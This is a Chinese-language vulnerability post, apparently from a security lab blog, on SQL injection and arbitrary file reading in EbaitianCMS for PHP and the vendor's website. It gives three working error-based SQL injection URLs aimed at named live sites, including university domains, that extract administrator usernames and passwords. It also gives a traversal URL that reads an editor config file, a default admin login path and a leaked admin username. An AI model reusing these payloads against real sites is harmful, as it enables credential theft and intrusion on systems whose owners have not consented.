EbaitianCMS For PHP V2012多个版本及官网SQL注入漏洞

xpower 实验室 1073 阅读

经测试,此漏洞官网(www.ebaitian.cn)也有,而且官网的更加严重。。。
测试版本:
EbaitianCMS For PHP V2011Beta3.2
EbaitianCMS For PHP V2012Beta5.2
EbaitianCMS For PHP V2012CN6.0
EbaitianCMS 官方网站
漏洞文件:
很多。。。举个(栗)子。。。

http://jwc.cjxy.edu.cn/class.jsp?bigclassid=9&smallclassid=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+2,1))a+from+information_schema.tables+group+by+a)b%23

http://cjxytsg.home51.net:81/class.jsp?bigclassid=9&smallclassid=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+0,1))a+from+information_schema.tables+group+by+a)b%23

http://jwc.ezu.cn/show.php?id=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+0,1))a+from+information_schema.tables+group+by+a)b%23

直接错误回显注入套公式得到管理员登陆信息

\" height=

 

 

 

 

后台登陆地址在前台页脚有

这是版本为:PHP V2012Beta5.2的后台登陆后的页面

\" height=

 

 

 

 

 

 

 

这是版本为:PHP V2012CN6.0的后台登陆后的页面

\" height=

 

 

 

 

 

后台的ewebeditor编辑器,默认后台未删除:
http://www.ebaitian.cn/ebaitiancn/ebteditor/admin/login.php
登陆后台后,可以使用后台数据库操作的,数据库备份恢复程序来读取服务器的配置文件
数据库恢复 模块工作原理:通过GET取得sql文件名称,系统不做任何检查,将文件载入MySQL并执行语句
如果GET获取的SQL备份文件是php代码文件,SQL将报错,并将php文件代码的前几行爆出
因此可以使用该模块的:

http://www.ebaitian.cn/ebaitiancn/module/databases/ebaitian_datapress.php?action=rebackup&f=../ebteditor/php/config.php

来读取ewebeditor的配置文件
这里读得:

$sUsername = "ebtadmin"

密码自由想象

通过测试,V5.2和V3.2版本的程序,ewebeditor的加密config文件都是文字游戏编码加密过的,而官网的6.0版本则是明文。

官网都如此的不值得信赖。。。真悲催

THE END
分享
二维码
< <上一篇
下一篇>>